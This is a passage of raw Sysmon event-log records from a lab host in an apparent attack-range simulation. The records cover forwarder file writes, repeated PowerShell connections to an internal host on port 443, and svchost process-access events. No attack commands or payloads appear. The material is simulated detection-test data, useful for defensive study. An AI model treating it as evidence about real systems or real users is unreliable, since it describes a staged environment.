23542300x800000000000000035342425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:39.367{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4384CD065CAE642E6DF2E8CB7EDC52A0,SHA256=D4C2514031A6D713E2BB181445E11DADF698238BFDF11CE063813E979EEC1637,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:39.201{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3A61D0721D9B38B4EF9390566D8892,SHA256=B8723EC5B46685C0D98801AE538BB221401A6842AB138ADBA73CF4A8A73EFC01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:05.281{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52425-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:40.235{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5987BDA9657487728BC4D5B9F5BFFF,SHA256=CB11E54980EABD25929253520537B8B90709A8BE5160D12065ED2E8D1D410E03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:41.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27F34A47164A5132B26181F9EFD7E79,SHA256=9D3D2FDA9539D766332DDB121F5E7ECE7D1E5339B82405229CE4DBBD4D8D9F78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:42.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=386714EA720438A17E5501C0ACD2114F,SHA256=431BC97834A74F3ABF1DCE0ECCAF10DC5A3082AF8981F5569069340AC9284FAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:43.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E4F126AB9751E7241A288D5D3AB8C6C,SHA256=933F8CBDAEF250C62B63C638BF6E7CEE3155E9E12061FE841F8102059D00A35B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:44.879{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2BEA8F7D7D8FBD755EB46B6AC3131BB1,SHA256=ADFC944519BE6FE1796BD73C8DBFCCDF93BFF98A6DA29F182A776A721506D444,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:44.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6FDC6DAAFC936B5663F9022A33C726C,SHA256=C54E13C839B3EFF8B83DA3625241DAA652DF7824A8FBFAECE1765521EB48C363,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:11.296{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52427-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:11.048{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52426-false10.0.1.12-8000- 23542300x800000000000000035342437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:45.417{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ADFAED4BDC653B5D0EB87ACDAF83F08B,SHA256=3AAEA2ACC4329B0F58B2381EDB0626975C62F21935C6633EDC6E1FD7C0D089F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:45.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB675129E67AE61859FD7039CA1A6C8,SHA256=857652D97BEBDDC11E504BF62E2CBBEF2A00F681FD180B105BD41338C0C1A08A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:46.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB60017CAE43E269BADEF1BF3064908,SHA256=2CC4FE54E7779DEFEC8B5FCA1C51154386892816C83AD89FB1EDE0DA0AA7ACF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:47.417{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E6FC8D8037E2762C77BA0C1CB34836,SHA256=5C46AF9857BC357E95E0F661DD9138BD4CC44627A059AF7818E7A98E23810FA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:48.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=658B1EF47FACD7ADDAF4F1A318927C28,SHA256=28D0EA81B153EDFF463E82C334F12D765BA4272411C12905C89E994CA235697A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:49.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965C4FA5A4809505BB7CF5F884F2EC57,SHA256=669E23A6306FCFA08D814DB2A36178432FEB4A4A5C6D8E5E8404B3C77F373DF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:50.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6621B10DC21F77EF169F37F3E329C3AF,SHA256=B52D1DCC4B034BC3969974A6E5433C704F52718F7F64316CF6DC06804DF8302E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:50.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6F017BE20D5FF214AC83B1119DA01A44,SHA256=6906495C28AD8A300366907DECBDEE8527A8448F332FF4E479E94F60318274AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:51.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152B47D6F914B13556DB39805FA97A2D,SHA256=E5FC4D0DC89FA962531173B64131049FFC3DC47D7E5A7F63BA563274EB0FBC42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:16.315{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52429-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:16.130{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52428-false10.0.1.12-8000- 23542300x800000000000000035342449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:52.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E4998F3DA5B805BE4CD7747E77F69BB,SHA256=39DB41D62BA9DA17375F0711251CC2D8F6E79BCB3E0D431E84D6E483984FC38D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:53.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D147F85CB0B339E95F1E384886675986,SHA256=3957A827E294064711C8C405FFE79C471200DCA26F7833E9F79178CFFF5600D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:54.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95625A8E41E84CB3338C3B98392FC416,SHA256=C7FB502E9EFA8F4F8F680126B8A5E1777A0B46FC2EF0F5A2163EE600EE5A2EBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:55.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C0BBBB7B0D394A88BB104ABA341988,SHA256=EB849DB666B7B6F7C2F7293D25B9CAD49938ED4AF8A146080F56F40B71CB534E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:56.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBEBE7FD75A8F32CD7F79037808B2068,SHA256=C5F1C73996289466358090D9340891AEE6262A5EE9AC541A40FD453EDC14A566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:56.340{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=983AD7D6B26E91C97594AE9972DD2D12,SHA256=132F67744D35137C4F2DB94C4C7435068F584997CA35C703C74FC154D81AE510,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:21.173{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52430-false10.0.1.12-8000- 23542300x800000000000000035342456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:57.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAEDE07760D25FC195B4F8CA1722ED27,SHA256=90E6DDBA999AF5875C61F9695F5806573ACE288B95332700F9BFD99A9FF240B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:58.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F8B30082FBF62BF7AE31B8270FA5A8B,SHA256=BE5F098C92E463CE8D99AB0CB735711E36424A59B25E54B99104FCEC91A2DBA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:22.326{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52431-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035342487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 